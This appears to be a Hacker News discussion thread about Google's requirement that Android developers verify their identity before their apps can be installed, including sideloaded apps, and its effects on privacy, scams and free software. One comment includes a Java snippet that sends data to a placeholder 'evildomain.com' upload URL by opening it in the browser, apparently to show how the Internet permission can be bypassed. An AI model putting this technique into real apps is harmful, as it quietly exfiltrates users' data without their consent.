Also https://techcrunch.com/2025/08/25/google-will-require-develo... (from merged thread)
Official announcement 1: https://android-developers.googleblog.com/2025/08/elevating-...
Official announcement 2: https://developer.android.com/developer-verification
Play Console Help: https://support.google.com/googleplay/android-developer/answ...
> Verify your identity
> * You will need to provide and verify your personal details, like your legal name, address, email address, and phone number. > * If you're registering as an organization, you'll also need to provide a D-U-N-S number and verify your organization's website. > * You may also need to upload official government ID.
Only one of those three applies to organizations.
>A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.
Nothing about it says anything about having lighter requirements, just not going through a Play Console link. Even if the requirements end up being "lighter", the minimum will always be at least "link a Google account", which is already a massive privacy breach.
> It also doesn't prevent you from side loading.
It absolutely does. Quoting from Google:
>Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices.
certified Android devices being... 99.9% of all Android devices in existence.
https://android-developers.googleblog.com/2025/08/elevating-...
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (>>44765939 ), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
[1] >>41895718
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
More info:
https://developer.android.com/developer-verification
https://support.google.com/googleplay/android-developer/answ...
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, some body called BS on browsers and we might have a good option soon in Ladybug!
https://developer.android.com/develop/connectivity/network-o...
It isn't possible to ban encryption, so the governments have to chip away at security and privacy using these techniques.
From: https://developer.android.com/developer-verification
"You may also need to upload official government ID."
This won't end well for Google or the governments involved when the people get so angry that they are forced to roll this back. Switch to an alternative phone OS.
"You'll need to prove you own your apps by providing your app package name and app signing keys."
That is capital-I Insane.
Nope. There was an issue in iPhones and Nexus phones that had been used for a few years where a worn battery could no longer maintain a voltage high enough to meet instantaneous SOC power demand, resulting in unexpected device shut downs.
Apple got the device to quit shutting off without warning by throttling older devices and Google did nothing and just told users to buy a new device.
They both got sued, and both lost.
> If you currently or formerly owned a Google Nexus 6P smartphone, we have some good news: you might be eligible for a cash rebate for those bootloops and spontaneous shutdowns the device was known for.
https://www.androidauthority.com/nexus-6p-lawsuit-2019-97547...
For the record, Apple notes that the DSA requirements only impact developers distributing through the App Store, not through alternative distribution [1].
[1]: https://developer.apple.com/help/app-store-connect/manage-co...
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
[0] https://www.nytimes.com/2003/06/30/business/technology-a-saf...
Fairphone from the Netherlands is another https://www.fairphone.com/
[0] https://grapheneos.social/@GrapheneOS/114665558894105287
[1] https://grapheneos.social/@GrapheneOS/114359660453627718
https://learn.microsoft.com/en-us/windows/apps/develop/smart...
For anyone else failing to resolve DNS for that domain: https://archive.is/q7w0x
> NSA: Linux Journal is an "extremist forum" and its readers get flagged for extra surveillance [0]
Looks like this is a part of the move toward Chat Control and ending E2E encryption.
[0] https://www.linuxjournal.com/content/nsa-linux-journal-extre...
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
[0] https://android-developers.googleblog.com/2025/08/elevating-...
Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
Intent i = new Intent(Intent.ACTION_VIEW, uri);
startActivity(i);
> XDA user XCnathan32, along with assistance from two other users, created the fix and put it up for anyone to give it a whirl. Without getting too technical, the fix shuts down all four of the Nexus 6P octa-core Snapdragon 810 processor’s performance cores that seemingly prevent the phone from properly booting
https://www.androidauthority.com/nexus-6p-bootloop-fix-78930...
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
https://calyxos.org/news/2025/08/01/a-letter-to-our-communit...
It does have an Android subsystem stuck on, but it's not necessary.
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
I will believe this when we stop seeing brazen malware in marquee app store apps, e.g. https://www.tracesecurity.com/blog/articles/meta-pixel-and-t...
You can apply for an HSBC Global Money Account if you have: […] The HSBC UK Mobile Banking app (Global Money is only available via the app)
From https://www.hsbc.co.uk/current-accounts/products/global-mone...
https://grapheneos.social/@GrapheneOS/115090818389369737
> "GrapheneOS doesn't include Google Mobile Services and the requirements for certification aren't relevant to us."
What someone needs to do is create a "Store" browser that loads apps from random websites like https://site.tld/app.apk
You could manually parse AndroidManifest.xml and allow only apps that expose <uses-permission android:name="android.permission.INTERNET" />
I'm somewhat interested in doing this myself actually. What do people think?
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
[1] https://classic.austlii.edu.au/au/legis/nsw/consol_act/ca190...
If they have anything on the platform that is subject to the CRA, they are a distributer:
https://www.cyberresilienceact.eu/cra-guide-for-importers-di...
And if what you want is a PDA that runs Linux, there are many options, e.g. https://www.clockworkpi.com/home-uconsole.
https://support.google.com/googleplay/android-developer/thre...
PDAs, now... have a look at https://www.clockworkpi.com/home-uconsole
https://developer.sony.com/open-source/aosp-on-xperia-open-d...
Basically none of this new restriction will bother me, since I don't run anything but stock AOSP and get all my apps from f-droid repos.
It's a huge pain to set up initially, but it's smooth sailing after that. There's a good tutorial at https://melatonin.dev/blog/code-signing-on-windows-with-azur...
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial (07 Feb 2024)
— https://www.channelnewsasia.com/singapore/google-android-dev...
It makes total sense to the average person. There has been a constant stream of “yet another Android user got scammed out of their life savings because of Android side loading; iPhone users not affected”
It’s an inconvenient fact for power users, but side loading makes users significantly more vulnerable to scams and restricting side loading is both a predictable and reasonable response to that fact.
If you don’t like this, you need a better argument than “my desire to run any app I want is more important than pensioners losing their life savings” because that is not a winning argument with the average person, with governments, or with Google/Apple.
> As I’ve mentioned here before, sideloading is a genuine security concern, not merely an excuse for Apple to exert control. There is a never-ending stream of people losing their life savings. It happens on Android and not iOS because Android allows sideloading and iOS doesn’t. There is a very real human cost to this.
> Police warn new Android malware scam can factory reset phones; over S$10 million lost in first half of 2023
> There have been more than 750 cases of victims downloading the malware into their phones in the first half of 2023, with losses of at least S$10 million (US$7.3 million).
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> DBS, UOB become latest banks to restrict access if unverified apps are found on customers' phones
> They are the latest banks in Singapore to do so – after OCBC and Citibank – amid a spate of malware scams targeting users of Android devices.
— https://www.channelnewsasia.com/singapore/dbs-uob-anti-scam-...
> 74-year-old man loses $70k after downloading third-party app to buy Peking duck
> “I couldn’t believe the news. I thought: Why am I so stupid? I was so angry at myself for being cheated of my life savings. My family is frustrated and I ended up quarrelling with my wife,” said Mr Loh, who has three children.
— https://www.straitstimes.com/singapore/74-year-old-man-loses...
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial
> "Based on our analysis of major fraud malware families that exploit these sensitive runtime permissions, we found that over 95 per cent of installations came from internet-sideloading sources," it added.
— https://www.channelnewsasia.com/business/anduril-secures-305...
> CNA Explains: Are Android devices more prone to malware and how do you protect yourself from scams?
> Why are scammers more likely to target Android users? How do you spot a fake app and what should you do if your device is infected by malware?
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> Nearly 2,000 victims fell for Android malware scams, at least S$34.1 million lost in 2023
> In 2023, about 1,899 cases of Android malware scams were reported in Singapore. The average amount lost was about S$17,960.
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> Android users in Singapore tried to install unverified apps nearly 900,000 times in past 6 months
> These attempts were blocked by a security feature rolled out by Google six months ago as part of a trial to better protect users against malware scams, which led to at least S$34.1 million (US$25.8 million) in losses last year with about 1,900 cases reported.
— https://www.channelnewsasia.com/singapore/android-users-inst...
[1] https://grapheneos.org/donate
https://www.bitdefender.com/en-us/blog/hotforsecurity/hacker...
I already got popup in dashboard this morning
Path 1: a ZK-proof attestation certificate marketplace implemented by GrapheneOS (or similar) to prove safety in a privacy-securing way enough for 3rd party liability insurance markets to buy in. Banks etc can be indifferent, and wouldn't ignore the market if it got big enough. This would mean we could root any device with aggressive hacking and then apologize for it with ZK-proof certs that prove it's still in good hands - and banking apps don't need to care. No need for hard chains of custody like the Google security model.
Path 2: Don't even worry too hard about 3rd party devices or full OSes, we just need to make the option viable enough to shame Google into adopting the same ZK certificate schemes defensively. If they're reading all user data through ZK-proof certs instead of just downloading EVERYTHING then they're significantly neutered as a Big Brother force and for once we're able to actually trust them. They'd still have app marketplace centrality, but if and when phones are being subdivided with ZK-proof security it would make 3rd party monitoring of the dynamics of how those decisions get made very public (we'd see the same things google sees), so we could similarly shame them via alternatives into adopting reasonable default behaviors. Similar to Linux/Windows - Windows woulda been a lot more evil without the alternative next door.
Longer discussion (opinion not sourced from AI though): https://chatgpt.com/share/68ad1084-eb74-8003-8f10-ca324b5ea8...
I gather the introduction of the android:allowBackup="false" manifest flag complicated things somewhat... I thought I read since then that a Device-to-Device (D2D) impersonation mode was implemented, and would love to hear if that helped?
(I posted a couple years ago about this topic, admittedly it was a bit ranty: >>37774254 )
Basically, they're not really setting up for a blanket ban on personal security features, that interpretation is obviously catastrophizing. Not that there aren't hamfisted laws somewhere like this, but NSWs implementation seems OK I guess
You will need to boot to recovery mode, go through utility and enable it: https://support.apple.com/en-ca/guide/mac-help/mchl768f7291/...
Basically average users will never be able to pull this off.
Meanwhile, you're not looking at those who left, or those who decided to never enter a broken market dominated by players convicted of monopolistic practices.
This seems much more intuitive than a hypothesis where somehow people would prefer to enter a closed market over a fair and open market with no barriers to entry.
Remember, monopolists succeed because they are distorting the market, not because they are in fact the most efficient competitor.
https://sfconservancy.org/copyleft-compliance/vizio.html https://sfconservancy.org/blog/2021/mar/25/install-gplv2/ https://sfconservancy.org/blog/2021/jul/23/tivoization-and-t... https://events19.linuxfoundation.org/wp-content/uploads/2017...
"Many other devices are supported by GrapheneOS at a source level, and it can be built for them without modifications to the existing GrapheneOS source tree."
https://www.tomshardware.com/software/windows/microsoft-elim...
It's still possible to set up using only a local account, but who knows for how long.
Will once again re-up the concept of a “right to root access”, to prevent big corps from pulling this bs over and over again: https://medhir.com/blog/right-to-root-access
Yes, I've cherry picked from the minority of countries with near or over half iOS market share. But, they're all high GDP countries with a very valuable customer base. Apple and Google care about these markets, they don't care about global market share.
[1] https://gs.statcounter.com/os-market-share/mobile/australia [2] https://gs.statcounter.com/os-market-share/mobile/united-sta... [3] https://gs.statcounter.com/vendor-market-share/mobile/united... [4] https://gs.statcounter.com/os-market-share/mobile/japan [5] https://gs.statcounter.com/vendor-market-share/mobile/canada [6] https://gs.statcounter.com/os-market-share/mobile/denmark [7] https://gs.statcounter.com/os-market-share/mobile/switzerlan... [8] https://gs.statcounter.com/os-market-share/mobile/sweden
Banking apps in Malaysia are required to include malware detection software [0]. Companies should have better fraud and trust teams to identity and block fraud activities.
The rest of the world shouldn't suffer because a handful of banking companies refuse to offer basic fraud protections for their users.
[0] - https://www.abm.org.my/press-releases/banks-to-enable-malwar...
I didn’t notice that Hacker News had truncated the URLs for display. You can get to the articles by following the links in the original comment.
> You are aware that it's not the app store that protects you, but the sandboxing?
Both protect you.
> Are these impersonation vectors, ie phishing?
It’s a variety of things. Some use accessibility hooks to act as key loggers. Some seem to use exploits. Some are phishing by impersonating other apps.
That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected
> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.
The courts assumed good faith with a licensing exception, and maybe it was. But that opened the door to essentially completely dismantle the first-sale doctrine. Get rid of that loophole and all this stupidity ends, immediately. Well that and the DMCA. Once you buy something, it's yours to do whatever you want to do with it short of replicating it for commercial benefit.
The thing is, GPS access as a permission is a bit scary. You could imagine some dubious uses for it. Moreover, you could imagine some such dubious uses creating a public relations nightmare for Google. So, Google just forces them out of the Play Store. (Technically, it's a routine renewal, but the GPS permission causes them extra scrutiny, to the point where the author burned out and gave up.[2])
Do we expect that this author should, or for that matter will, give their identity to Google after this? Or is GPSLogger just dead after this change lands?
[1]: https://gpslogger.app/ [2]: https://github.com/mendhak/gpslogger/issues/849
They’ll try again, with big business and governments cheering on them.
If there's enough interest in US, then they may release it there, too.
https://www.electronforge.io/guides/code-signing/code-signin...
If you agree that above are edge cases too, I have a Volkswagen to sell you [0].
GamersNexus' 3 hour documentary about GPU smuggling (which is way more than a vlog as HN commenters like to portray) is struck down by Bloomberg because they didn't want their 30 second clip, which is squarely fair use BTW, of POTUS speaking to be in that. GamersNexus repealed successfully, but Bloomberg tried to bully them [0].
You can buy a Linux phone today and make sure the vendors get their food on the table. Software is getting better. If you choose a phone with mainline kernel support (e.g. one that can run Mobian or PureOS), you can literally watch your OS improve month after month.
Alternatively, you can support the user-space ecosystem directly and fund the developers who make it happen. Donate to Sebastian Krzyszkowiak [0] and Guido Günther [1] if you can!
Weird apps that block your phone and show ads constantly (yes this exists)
Typosquatting apps
Apps that hold your phone for ransom if you don't pay a certain debt (yes this exists) https://www.welivesecurity.com/en/eset-research/beware-preda...
It does require the developer to make minor adjustments, and most banks are simply too risk averse to agree to doing that (I would know, used to be a senior android app dev at a bank).
[0]: https://grapheneos.social/@GrapheneOS/115062761036828110
I think his take on what compromises are valid and what aren't makes this clear: https://www.gnu.org/philosophy/compromise.en.html
In fact, this particular incident, re Android, a seemingly "open" system, is a perfect example of the importance of his PoV in particular, as it illustrates that Open Source ideology would not have been enough to ensure the user is in control.
https://www.zdfheute.de/wirtschaft/unternehmen/gmx-google-pl...
Rechtsprechung (court decision of LG Mainz, 22.08.2025, 12 HK O 32/24), text isn't published yet as of today:
https://dejure.org/dienste/vernetzung/rechtsprechung?Gericht...
If you search for the Aktenzeichen ("12 HK O 32/34") you'll find other news sources that confirm this.
Can’t be bypassed without root and otherwise all rom not official and validated by Google are on time watch.
https://android-developers.googleblog.com/2024/12/making-pla...
Ask yourself how come free software is everywhere, with licenses for various stuff neatly tucked away out of sight unless you're trying to find it, not to mention all the giant clusters of Linux machines in data centers running Samba, PostgreSQL, and all sorts of free software, and at the same time the FSF still has just a small appartment on the 5th floor of a building in Boston?
Here, take a look: https://www.fsf.org/about/contact/tour-2010
I love GrapheneOS but they can only thrive if Google tolerate them. So in its current form, this is not a medium or long term solution (anymore).
We really cannot afford to think in terms of "Android OS" or open source OS anymore the problem is getting much bigger.
My guess is soon in many "free" countries, ISP will mandate connecting with a "Certified" device (someone was saying that in Brazil only cell phones certified by the teleco government agency can be imported already). And on mobile it is easy to implement since you need a (e)SIM. The Internet is still hard to control at the protocol level, but the gates are easy to mostly control (your ISP).
In terms of mobile computing I mostly care about being able to access my home network from the places I am 80% of the time (and I can always bridge to the Internet from there). So the real battle is really at the mesh and multi-hop mobile ad hoc networks. This is the aspect we neglected for 25 years.
Regarding mobile, the battle for Android is lost, time to look into things like B.A.T.M.A.N [0] so we be able to keep another open source mobile platform useful.
For anything "money" related, your bank (which is inevitably regulated) will have to mandate a certified device too. It will work on (some) Linux too.
Ever wondered why for example the Fedora project [1] is proudly part of things like The Digital Public Goods Alliance [2] who works with many govs and if you really look into it they are all about digital ids and "restoring trust"?
- [0] https://www.open-mesh.org/projects/open-mesh/wiki
Having heard so much about anti-Tivoization when the GPLv3 was being drafted, and the discussions about it on linux-kernel when Linus decided the kernel will remain GPLv2-only, I was left with the impression that the GPLv2 only required the provision of source code, build scripts, etc. but not the ability to reinstall a new version. [1] makes a pretty good case that the ability to reinstall is also required GPLv2, and I'm heartened that's how Tivo saw it too.
[1] https://sfconservancy.org/blog/2021/jul/23/tivoization-and-t...
https://www.fsf.org/about/contact/
>As of September 1, 2024, we have gone remote and no longer have an office for people to visit.
IIRC they moved somewhere else in the interim.
Calculator.apk wants to open the web page https://eviltracker.example.com. Allow this time? Allow for 24 hours? Allow and don't ask me again?
What’s stopping us from making this a reality? We have passionate FOSS developers and visionary leaders capable of championing this cause and building a strong community around it.
I had high hopes for Marc Shuttleworth’s Ubuntu Phone. Unfortunately, after the Kickstarter campaign fell through, development stalled. I still believe consumers missed out on a remarkable piece of technology.
That said, I see Ubuntu Touch[1] is still active, though I’m unclear on its current impact or progress. Meanwhile, Smart TVs and smartphones continue to be dominated by Google’s Android OS.
FOSS/Linux has had many attempts at phones, but they need one good leader to do it, which is very hard unless someone with name recognition gets everyone to work on one project.
> The problem includes the actual control of how services are provided.
FSF has opinions about SaaS which they call SaaSS (Service as a Software Substitute).
https://www.gnu.org/philosophy/who-does-that-server-really-s...
https://9to5mac.com/2024/10/17/developers-address-phone-numb...
The same thing was applied to the Apple store at the same time.
This is a plot twist I never thought it would happen. While the EU [1], Japan [2] , UK [3] and Australia [4] are in the process of forcing Apple to allow sideloading and alternative App Stores, Google, which was far from these obligations, had taken a totally unexpected road to limit/control how sideloading should work.
____________________
1.https://developer.apple.com/support/dma-and-apps-in-the-eu/
2.https://www.phonearena.com/news/the-world-is-changing-japan-...
3.https://www.videogameschronicle.com/news/uk-passes-bill-whic...
4.https://www.theguardian.com/technology/2025/jun/06/australia...
Those same users can now install facebook, and facebook does this: https://medium.com/@ak123aryan/facebooks-hidden-android-trac...
And facebook is and will be verified in the future too.
They have the right to use cash, even if the vendor chooses not to accept it.
I learned this by trying to pay a fine with coins, which are NOT legal tender like cash is.
https://en.m.wikipedia.org/wiki/Legal_tender
> Each jurisdiction determines what is legal tender, but essentially it is anything which, when offered ("tendered") in payment of a debt, extinguishes the debt. There is no obligation on the creditor to accept the tendered payment, but the act of tendering the payment in legal tender discharges the debt.
Amazon's "Kindle" tablets and TV devices famously do not ship Google apps, and sometimes you see restricted devices like the Rabbit R1 that just use the open-source parts of Android. But outside of China I don't think you can easily walk into a store and find a non-Google Android phone.
I don't think phones ever officially lapse out of Play Protect certified status -- the Nexus One, a phone from 2010, is still listed -- but presumably it'd be possible to find a phone old enough that it won't be able to download whatever Play Services OTA update they'll use to push this change.
Not at all, that's why there are separate terms! GNU has an article that's worth reading: https://www.gnu.org/philosophy/open-source-misses-the-point....
I'll point out a very practical case. I was once-upon-a-time interested in Nostr, because I liked the relay idea. I looked for a client, and found one called Amethyst. When I installed it, I saw the author had inserted a pop-up on load that had me agreeing to his "Terms and Conditions" for using "the service". But the author had no service...he was worried about his liability if I posted something. Stallman saw this coming! From the article above:
> Third, the criteria for open source are concerned solely with the use of the source code. Indeed, almost all the items in the Open Source Definition are formulated as conditions on the software's source license rather than on what users are free to do. However, people often describe an executable as “open source,” because its source code is available that way. That causes confusion in paradoxical situations where the source code is open source (and free) but the executable itself is nonfree.
> The trivial case of this paradox is when a program's source code carries a weak free license, one without copyleft, but its executables carry additional nonfree conditions. Supposing the executables correspond exactly to the released sources—which may or may not be so—users can compile the source code to make and distribute free executables. That's why this case is trivial; it is no grave problem.
And this is _exactly_ the argument the author of Amethyst makes, check out how he reasons through the additional restrictions: https://github.com/vitorpamplona/amethyst/issues/378
His reasoning is squarely in this weird zone the Stallman wrote about:
> I am confused. Why are we mixing the license with the terms of use? These two files are separate legal matters. The Privacy is used by the Play Store to manage the distribution of the executables. The MIT license relates to the source code only.
> In other words, the MIT license removes any author liability from the misuse of the code. But when the author is also providing the system as binaries (which is an additional service in every jurisdiction I know of), there are many other legal issues that the source code license won't cover.
> And I don't know about you, but I am not comfortable allowing people to use the Play Store version or the FDroid version for these activities written in the Privacy statement. Most of them are local crimes that should not happen anyway.
> This has nothing to do with the source code license, which people can still download, compile and use in nefarious ways.
Anyway, my point is, in practice, there's a million ways to water down "open source" to remove user freedoms, and the value of Free Software is that it keeps the focus in the right place to avoid falling victim to those tricks.
https://www.androidheadlines.com/2025/07/eu-age-verification...
Since there are no viable alternatives, I guess it's time to go back to owning a cheap corporate/government approved phone for official business (i.e. banking), and another one that I actually use.
As an aside, the presentation[0] doesn't really go into the details how they will enforce this (on-device? Remotely? If the latter, can I just remove Play Services from my device to sideload whatever?), but you can apparently submit feedback about the verification process here[1].
[0]: https://goo.gle/play-console-android-developer-verification [1]: https://docs.google.com/forms/d/e/1FAIpQLSdpZbsJCS-f7CtMbZPn...
That's news to me! But no. Open source philosophy isn't free software stripped of its ethics question. I have written an essay/article/novel/epic here: >>45027202
Knox sounds like a pretty awesome feature though.
I use `nix-on-droid` on a Pixel 9 running stock Android 16. It provides me with a nix shell that gives me ZSH, Starship prompt, NeoVim, w3m, ssh, alpine, Claude-code, Circumflex (TUI HackerNews Client) and just about anything else I want from the Nix packages ecosystem. I even have NUR ( Nix User Repositories) set up. I daily drive NixOS for work and for Pleasure. It's the most advanced operating system I've ever encountered. I can't wax enough praise.
The closest thing to a truly open source, fully functional and daily used mobile that I ever had was the Nokia N900. Man how I miss that thing. Maemo was Nokia's original Linux-based mobile OS, which ran on the N900/950.
MeeGo was created when Nokia merged Maemo with Intel's Moblin project around 2010. It was supposed to be the future of Nokia smartphones, but Nokia abandoned it in 2011 when they switched to Windows Phone as their primary smartphone platform. Idiots.
Mer was created as an open-source continuation of MeeGo after Nokia dropped it.
Sailfish OS was then built on top of Mer by Jolla, a company founded by former Nokia employees who had worked on MeeGo.
Jolla launched in 2013 with the goal of continuing the Linux mobile vision that Nokia had abandoned. They make phones and tablets.
[0]: https://en.wikipedia.org/wiki/Web_Environment_Integrity
I hate how this always gets brought up because:
1. Evil has no definition, so it means nothing. They get to define what evil is for themselves. They stated their reasons they think this change is good. You can't prove it breaks their code of conduct.
2. It's straight up false, it's still in their code of conduct:
> And remember... don’t be evil, and if you see something that you think isn’t right – speak up!
https://www.gnu.org/philosophy/free-sw.html#four-freedoms
Quote below:
The four essential freedoms
A program is free software if the program's users have the four essential freedoms: [1]
The freedom to run the program as you wish, for any purpose (freedom 0).
The freedom to study how the program works, and change it so it does your computing as you wish (freedom 1). Access to the source code is a precondition for this.
The freedom to redistribute copies so you can help others (freedom 2).
The freedom to distribute copies of your modified versions to others (freedom 3). By doing this you can give the whole community a chance to benefit from your changes. Access to the source code is a precondition for this.A simple google search away.
> I could see that this is also an issue for scam apps.
> Firefox for instance does not allow you to install unsigned extensions.
[0] https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/Web...
For other people to use your extension, you need ***to package it and submit it to Mozilla*** for signing.The computer owner in (a) is not creating "malware". Any arguments that "verification" is for the protection of users (not commercial benefit of Google) are inapplicable in (a). Unlike the software in (b) the software in (a) only runs on the computer owner's computer, not anyone else's computer. There is no need in the case of (a) for Google to know about what software is running on the computer owner's computer.^1 Surely Google would agree there is no need, i.e., no right, for a computer owner seeking "verification" to know what software is running on Google's computers or the identities of Google employees.
1. None that outweighs the owner's right to privacy. Microsoft, Apple and Google all use _default_ telemetry
https://gist.github.com/alirobe/7f3b34ad89a159e6daa1
https://github.com/cedws/apple-telemetry
https://apple.stackexchange.com/questions/437068/eliminating...
https://therecord.media/google-collects-20-times-more-teleme...
https://www.theregister.com/2025/08/26/apps_android_malware/
https://arstechnica.com/security/2024/09/11-million-devices-...
https://www.cpomagazine.com/cyber-security/over-300-maliciou...
Not sure which numbers you are expecting, but 90 million downloads combined isn’t insignificant.
https://extensionworkshop.com/documentation/publish/signing-...
You can temporarily install extensions in about:debugging, but everything permanent needs to be signed.
> Add-ons need to be signed before they can be installed into release and beta versions of Firefox. This signing process takes place through addons.mozilla.org (AMO), whether you choose to distribute your add-on through AMO or to do it yourself.
That means, we have to do it ourselves. The first thing we can do is write to our MEPs. All of them. Thankfully, x775 has made a website in protest to the EU chat control law that makes find your MEPS E-mail addresses really easy, so maybe we can just take advantage of their work and use it to frame our own request. The relevant HN post is here: >>44858504
Could this be a way forward???
[0] https://www.zdfheute.de/wirtschaft/unternehmen/gmx-google-pl... in German, I'm afraid
[0] >>45033035
[1] >>45035699
Even though Google has not revoked similar controversial policies in the past, we do our best as much as we can. This change particularly threatens the freedom to build, share, and use software without giving away sensitive personal information. It affects independent developers, FOSS contributors, and even regular users who want to install apps outside of Google Play.
"Just imagine giving sensitive personal, government-issued ID to a corporation to install an app outside Google Play"
Let’s stand together to protect our freedom to create and use software without handing over personal information to a corporation. Every signature, share, and voice counts here
Support the petition here: https://chng.it/tyHZjstxWQ
> I really would like to have been payed
> to use Windows phones
I.e. I'm poking holes in your (somewhat unstated) premise that they'd already reached around 10% of marketshare, and could have just organically grown from there. As reporting at the time shows[1] the average selling price of these phones was €72.4.
So Microsoft (Nokia, but we all know who was really running/paying for the show) were spending a lot of money to buy themselves into the market, and just barely holding on to double digit market share for a bit there by subsidizing entry level phones.
1. https://www.theguardian.com/technology/2013/oct/01/microsoft...
I thought that was what you meant too? If you mean TOTP via a QR code exposing the secret, then of course I agree, no banks allow that. But your comment read as a claim that all TOTP solutions were inherently deemed insecure and wouldn't work, and that smartphone based solutions were the only viable alternative outside the US. The code display is of course vulnerable to man-in-the-middle attacks where you trick users into authorizing transactions via fake web pages, but it is not a threat that is deemed serious enough to prevent our whole country from basing our digital infrastructure on code displays.
I think people get hung up on your point about banks not accepting browsers because you don't formulate your point very clearly, and it reads like you claim that they don't accept browsers at all when what you mean is just a browser and nothing else. Most European banks do in fact allow you to do business using a browser - you just have to prove your identity via other means as well. And there are no good security arguments why those means must be in the form of a smartphone app whose security requirements have the side effect of locking you into a business relationship with one of two American tech giants. As you can see, a whole country of almost six million people authenticates everything from bank transactions to naming their kids and buying houses using a system which allows you to use just a code display.
I think the strategy of remote attestation of the whole OS stack up to and including the window manager is a clunky and inelegant approach from an engineering perspective, and from a freedom perspective I think it is immoral and should be illegal. What I could accept would be an on-phone security module with locked down firmware which can simply take control of the whole screen regardless of what the OS is doing, with a clear indicator of when it is active. This allows you to authorize transactions and inspect their contents, and only needs remote attestation of the security module, not the whole OS.
And it does exist: https://en.wikipedia.org/wiki/Librem_5
https://www.dr.dk/nyheder/seneste/mitid-kan-digitalt-udelukk...
So my guess is that this is not because they think TOTP is secure enough but rather due to the political aspects of it being centrally run by the government.
The security argument is pretty straightforward and I guess you know it already, because as you say, TOTP is vulnerable to phishing (unless you use some of the anti-bot tech I mentioned elsewhere but it's heuristic and not really robust over the long term). Whereas if you do stuff via an app, not only can malware not authorize transactions, but it can't view your financial details either - privacy being a major plank of financial security that can't be reliably offered via desktop browsers at all, but can via phones.
The alternative you propose is basically a secure hypervisor. Such schemes have been implemented in the past, but it's not ideal technically. For fast payment authorization via NFC, this is actually how it works, which is why when you touch a phone to a terminal to pay for something you don't see any details of the transaction on the display itself, just an animation. The OS doesn't get involved in the transaction at all, it's all handled by the embedded credit card smartcard which is hard-wired to the NFC radio. The OS gets notified and can send configuration messages, but that's about it.
